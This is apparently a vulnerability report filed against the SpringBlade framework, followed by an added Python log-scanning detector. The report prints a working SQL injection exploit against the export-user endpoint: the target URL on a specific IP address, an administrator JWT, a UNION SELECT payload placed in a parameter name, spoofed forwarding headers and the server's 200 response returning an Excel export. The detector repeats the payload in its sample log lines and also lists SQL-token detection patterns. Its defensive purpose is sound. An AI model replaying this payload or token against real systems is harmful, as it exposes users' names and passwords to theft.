I. What are the steps to reproduce the problem?
1. Security scan
2. Access the framework interface
3. SQL injection discovered
SQL injection vulnerability in the SpringBlade framework back-end export-user path: an attacker can export sensitive information such as usernames and passwords through the Excel export.
II. What result did you expect, and what did you actually see?
III. Which product and version are you using, and on which operating system?
IV. Please provide the detailed error stack trace; this is important.
V. If you have more details, please provide them below.
Constructed request
Exploit point:
https://113.249.153.183:8829/api/blade-user/export-user?Blade-Auth=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzUxMiJ9.eyJpc3MiOiJpc3N1c2VyIiwiYXVkIjoiYXVkaWVuY2UiLCJ0ZW5hbnRfaWQiOiIwMDAwMDAiLCJyb2xlX25hbWUiOiJhZG1pbmlzdHJhdG9yIiwicG9zdF9pZCI6IjExMjM1OTg4MTc3Mzg2NzUyMDEiLCJ1c2VyX2lkIjoiMTEyMzU5ODgyMTczODY3NTIwMSIsInJvbGVfaWQiOiIxMTIzNTk4ODE2NzM4Njc1MjAxIiwidXNlcl9uYW1lIjoiYWRtaW4iLCJuaWNrX25hbWUiOiLnrqHnkIblkZgiLCJ0b2tlbl90eXBlIjoiYWNjZXNzX3Rva2VuIiwiZGVwdF9pZCI6IjExMjM1OTg4MTM3Mzg2NzUyMDEiLCJhY2NvdW50IjoiYWRtaW4iLCJjbGllbnRfaWQiOiJzYWJlciJ9.UHWWVEc6oi6Z6_AC5_WcRrKS9fB3aYH7XZxL9_xH-yIoUNeBrFoylXjGEwRY3Dv7GJeFnl5ppu8eOS3YYFqdeQ&account&realName&account+like+?+and+is_deleted%3d?)union+select+1,2,3,user(),5,6,7,8,from_unixtime(1451997924),10,11,12--a=1
Attack payload:
GET /api/blade-user/export-user?Blade-Auth=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzUxMiJ9.eyJpc3MiOiJpc3N1c2VyIiwiYXVkIjoiYXVkaWVuY2UiLCJ0ZW5hbnRfaWQiOiIwMDAwMDAiLCJyb2xlX25hbWUiOiJhZG1pbmlzdHJhdG9yIiwicG9zdF9pZCI6IjExMjM1OTg4MTc3Mzg2NzUyMDEiLCJ1c2VyX2lkIjoiMTEyMzU5ODgyMTczODY3NTIwMSIsInJvbGVfaWQiOiIxMTIzNTk4ODE2NzM4Njc1MjAxIiwidXNlcl9uYW1lIjoiYWRtaW4iLCJuaWNrX25hbWUiOiLnrqHnkIblkZgiLCJ0b2tlbl90eXBlIjoiYWNjZXNzX3Rva2VuIiwiZGVwdF9pZCI6IjExMjM1OTg4MTM3Mzg2NzUyMDEiLCJhY2NvdW50IjoiYWRtaW4iLCJjbGllbnRfaWQiOiJzYWJlciJ9.UHWWVEc6oi6Z6_AC5_WcRrKS9fB3aYH7XZxL9_xH-yIoUNeBrFoylXjGEwRY3Dv7GJeFnl5ppu8eOS3YYFqdeQ&account&realName&account+like+?+and+is_deleted%3d?)union+select+1,2,3,user(),5,6,7,8,from_unixtime(1451997924),10,11,12--a=1 HTTP/1.1
Host: 113.249.153.183:8829
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36
Connection: close
'user-Agent: Chrome/103.0.0.0 Safari/537.36'
X-Forwarded-For: 127.0.0.1
X-Originating-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Remote-IP: 127.0.0.1
Accept-Encoding: gzip
Target response:
HTTP/1.1 200 OK
Connection: close
Transfer-Encoding: chunked
Content-Disposition: attachment;filename=%E7%94%A8%E6%88%B7%E6%95%B0%E6%8D%AE20240729105346.xlsx
Content-Type: application/vnd.ms-excel;charset=UTF-8
Date: Mon, 29 Jul 2024 02:53:47 GMT
Server: nginx/1.15.8
Vary: Origin
Vary: Access-Control-Request-Method
Vary: Access-Control-Request-Headers
[Binary response body omitted: a ZIP/OOXML .xlsx archive (entries _rels/.rels, [Content_Types].xml, docProps/app.xml, docProps/core.xml, xl/sharedStrings.xml, xl/styles.xml)]
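The payload above is unusual in that the SQL fragment travels in a query-string parameter *name* (`account like ? and is_deleted=?)union select ...`), not in a value, so value-only input filtering would miss it. The following detection script, added here as an example and not part of the report or of SpringBlade, parses access-log request lines for the export-user path and flags parameters whose decoded name or value contains SQL syntax. `ALLOWED_PARAMS`, `EXPORT_PATH` and the sample log lines are assumptions constructed for the example; the real token from the report is replaced by a placeholder. It also covers the more common value-based variant, which the report itself does not show.

```python
"""
Added detection example (not SpringBlade code): flag /api/blade-user/export-user
requests whose query-string parameter names or values carry SQL syntax.
ALLOWED_PARAMS, EXPORT_PATH and SAMPLE_LOG are assumptions made for this example.
"""
import re
from urllib.parse import parse_qsl, urlsplit

EXPORT_PATH = "/api/blade-user/export-user"

# Parameters this endpoint is expected to accept (assumption; adjust to the deployment).
ALLOWED_PARAMS = {"Blade-Auth", "account", "realName"}

# SQL syntax that never belongs in a filter parameter for this endpoint.
SQL_TOKENS = re.compile(
    r"\bunion\b\s+(?:all\s+)?\bselect\b"        # set-operator injection
    r"|--|/\*"                                   # comment terminators
    r"|\b(?:user|version|database)\s*\(\s*\)"    # information functions
    r"|\bfrom_unixtime\s*\("
    r"|[)'\";]",                                 # quote / parenthesis breakouts
    re.IGNORECASE,
)

# Combined/common access-log request line: method, target, protocol, status.
LOG_REQUEST = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+" (\d{3})')


def suspicious_params(url):
    """Return one finding per query parameter that looks injected.

    parse_qsl decodes percent-escapes and '+' in both names and values, so a
    fragment such as 'account+like+?+and+is_deleted%3d?)union...' is inspected
    in its decoded SQL form.
    """
    findings = []
    for name, value in parse_qsl(urlsplit(url).query, keep_blank_values=True):
        reasons = []
        if name not in ALLOWED_PARAMS:
            reasons.append("unexpected parameter name")
        for label, text in (("name", name), ("value", value)):
            m = SQL_TOKENS.search(text)
            if m:
                reasons.append(f"sql token in {label}: {m.group(0)!r}")
        if reasons:
            findings.append({"param": name, "value": value, "reasons": reasons})
    return findings


def scan_access_log(lines):
    """Return export-user requests with injected-looking parameters.

    A 200 on a flagged request means the server served the export file, so
    the hit is marked as probable data exfiltration rather than an attempt.
    """
    hits = []
    for line in lines:
        m = LOG_REQUEST.search(line)
        if not m or not m.group(1).startswith(EXPORT_PATH):
            continue
        findings = suspicious_params(m.group(1))
        if findings:
            status = int(m.group(2))
            hits.append({
                "target": m.group(1),
                "status": status,
                "exfil_likely": status == 200,
                "findings": findings,
            })
    return hits


# Constructed log lines (not from the report): a normal export, the
# parameter-name injection from the report with the token replaced by a
# placeholder, a value-based variant, and an unrelated endpoint.
SAMPLE_LOG = [
    '10.0.0.5 - - [29/Jul/2024:10:53:46 +0800] "GET /api/blade-user/export-user'
    '?Blade-Auth=TOKEN_PLACEHOLDER&account=admin&realName= HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [29/Jul/2024:10:53:47 +0800] "GET /api/blade-user/export-user'
    '?Blade-Auth=TOKEN_PLACEHOLDER&account&realName&account+like+?+and+is_deleted%3d?)union+select'
    '+1,2,3,user(),5,6,7,8,from_unixtime(1451997924),10,11,12--a=1 HTTP/1.1" 200 6342 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [29/Jul/2024:10:54:10 +0800] "GET /api/blade-user/export-user'
    '?Blade-Auth=TOKEN_PLACEHOLDER&account=admin%27--&realName= HTTP/1.1" 200 4870 "-" "Mozilla/5.0"',
    '10.0.0.5 - - [29/Jul/2024:10:55:01 +0800] "GET /api/blade-user/list'
    '?current=1&size=10 HTTP/1.1" 200 812 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for hit in scan_access_log(SAMPLE_LOG):
        print(hit["status"], "exfil_likely" if hit["exfil_likely"] else "attempt", hit["target"][:70])
        for f in hit["findings"]:
            print("    ", f["param"][:60], f["reasons"])
```

The parameter-name check is the high-signal rule: legitimate clients never send SQL syntax in a parameter name, and the second sample line fails both the allow-list and the token check. The quote check on values is lower severity because a real name such as O'Brien also contains an apostrophe, so in production it is better treated as a secondary indicator than as a blocking rule. Pair the log-side detection with the server-side fix of building export filters only from an allow-list of column names with bound parameters.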
https://www.kancloud.cn/smallchill/blade-safety/3234106
Read through every item in this security document.
There is also the matter of hiding error messages; see point 7 there.
The link you sent me doesn't have a point 7.